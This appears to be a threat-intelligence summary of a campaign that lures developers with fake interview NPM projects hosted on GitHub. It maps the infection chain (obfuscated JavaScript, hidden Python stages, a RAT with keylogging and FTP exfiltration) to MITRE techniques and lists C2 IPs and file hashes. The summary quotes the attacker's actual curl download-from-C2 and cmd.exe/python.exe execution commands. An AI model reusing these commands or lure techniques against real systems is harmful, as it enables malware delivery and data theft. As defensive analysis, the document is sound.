Keypoints
- Attackers lure software developers via fake interview zip archives hosted on GitHub that contain a seemingly legitimate NPM package.
- The NPM package hides a heavily obfuscated JavaScript (imageDetails.js) that runs under node.exe to download and extract a secondary archive from an attacker C2.
- Downloaded archive is extracted to the user’s temp folder and executed with python.exe by running a hidden extensionless Python file (.npl).
- The .npl file decodes a large base64/XOR payload and launches a second extensionless Python script (pay) which contacts C2 and executes further code.
- The pay script first collects system and network metadata and POSTs it to C2, then executes a larger RAT component providing persistent TCP C2, filesystem discovery, remote command execution, FTP exfiltration, clipboard capture and keystroke logging.
- Identified infrastructure includes C2 IPs 147.124.214[.]131 and 173.211.106[.]101 and several analyzed file hashes for sports_platform_app-main.zip, imageDetails.js, .npl and pay.
MITRE Techniques
- [T1105] Ingress Tool Transfer – Downloaded next-stage archive via curl from attacker server (‘curl -lo “C:Users[REDACTED]AppDataLocalTempp.zi” “hxxp://147.124.214[.]131:1244/pdown”’) (‘curl -lo … hxxp://147.124.214[.]131:1244/pdown’)
- [T1059.006] Command and Scripting Interpreter: Python – Executed hidden extensionless Python files using python.exe (‘Run python.exe and execute the hidden file which was just extracted “.npl”’) (‘Run python.exe and execute the hidden file which was just extracted “.npl”’)
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Used cmd.exe to run download and extraction commands (‘cmd.exe /d /s /c “curl -lo …”’ and ‘cmd.exe /d /s /c “”c:users[REDACTED].pyppython.exe” “c:users[REDACTED].npl”’) (‘cmd.exe /d /s /c “curl -lo …”’)
- [T1027.010] Obfuscated Files or Information: Command Obfuscation – JavaScript was heavily obfuscated with base64 and variable substitutions to hide behavior (‘The is obfuscated using several layers of obfuscation including base64 and variable substitutions.’) (‘The is obfuscated using several layers of obfuscation including base64 and variable substitutions.’)
- [T1071.001] Application Layer Protocol: Web Protocols (HTTP) – C2 communication and data exfiltration performed over HTTP POSTs to hard-coded C2 (‘The decoded result contains … a hard-coded C2 server: hxxp://147.124.214[.]131:1244’ and ‘transmitted in a JSON-like format back to the attacker’s C2 server by issuing a carefully crafted HTTP POST request.’) (‘The decoded result contains … a hard-coded C2 server: hxxp://147.124.214[.]131:1244’)
- [T1560] Archive Collected Data – Script archives and filters files for collection prior to exfiltration (collection and tar/extract behavior observed) (‘Using the tar command, extract zip file into the user’s temp directory’) (‘Using the tar command, extract zip file into the user’s temp directory’)
- [T1041] Exfiltration Over C2 Channel – Files and collected data are sent back to attacker-controlled servers and FTP for exfiltration (‘The Python script then calls and executes another Python script … sends this data to a remote server’ and ‘the Python script is able to send files to a remote FTP server’) (‘sends this data to a remote server’)
- [T1033] System Owner/User Discovery – Gathers hostname, username and generates a UUID from MAC and username to identify infected host (‘Operating system type … Hostname … Username of the logged-in user … uuid generated by hashing the MAC address and username’) (‘Operating system type … Hostname … Username of the logged-in user … uuid generated by hashing the MAC address and username’)
- [T1056.001] Input Capture: Keylogging – Implements keystroke logging capabilities to capture user input (‘The script includes capabilities to monitor and exfiltrate clipboard contents and keystrokes.’) (‘The script includes capabilities to monitor and exfiltrate clipboard contents and keystrokes.’)
- [T1115] Clipboard Data – Captures and exfiltrates clipboard contents (‘The script includes capabilities to monitor and exfiltrate clipboard contents and keystrokes.’) (‘The script includes capabilities to monitor and exfiltrate clipboard contents and keystrokes.’)
- [T1070.004] Indicator Removal on Host: File Deletion – Observed repository removal and staging cleanup tactics (report notes repositories deleted and recommends monitoring for file deletion) (‘At the time of publication, the attackers GitHub repositories we analyze below have already been deleted.’) (‘At the time of publication, the attackers GitHub repositories we analyze below have already been deleted.’)
Indicators of Compromise
- [IP Address] C2 infrastructure – 147.124.214[.]131, 173.211.106[.]101
- [File Name] Malicious artifacts delivered in archive – sports_platform_app-main.zip, imageDetails.js, and extensionless files .npl and pay
- [File Hash – SHA256] Analyzed payloads – 45c991529a421104f2edf03d92e01d95774bf54325f9107dd4139505912a0c1e (sports_platform_app-main.zip), 33617F0AC01A0F7FA5F64BD8EDEF737F678C44E677E4A2FB23C6B8A3BCD39FA2 (imageDetails.js), and 2 more hashes
- [URL/Host] Download endpoint observed in commands – hxxp://147.124.214[.]131:1244/pdown (used with curl to fetch p.zip)
Attack flow (technical procedure): The initial delivery is a ZIP containing a plausible NPM project that includes a Backend/imageDetails.js file with a very large, multi-layer obfuscated JavaScript payload. When a developer runs the package, node.exe executes the obfuscated script, which decodes embedded payloads and issues OS commands to fetch a secondary archive from the attacker server (curl to hxxp://147.124.214[.]131:1244/pdown), extracts it to the user’s temp folder using tar, and launches a hidden Python payload.
The extracted Python chain uses extensionless, dot-prefixed files (.npl then pay). The .npl file holds a large base64/XOR-encoded blob which is decoded in memory and exec()ed to run additional Python code. The decoded .npl points to the hard-coded C2 (hxxp://147.124.214[.]131:1244) and invokes the next-stage script stored under the user profile (e.g., C:Users\.n2pay).
The pay script decodes two embedded code strings: the first gathers host telemetry (OS type, hostname, OS version, username, and a UUID derived from MAC+username) and sends it via an HTTP POST to C2; the second implements RAT capabilities including persistent TCP connections with JSON framing, filesystem traversal and filtered file collection, remote command execution, FTP-based file upload/exfiltration, clipboard capture and keystroke logging. Detection should focus on script execution in user-writable locations (notably %APPDATA%), unusual python.exe process creation, and outbound connections to the listed C2 IPs.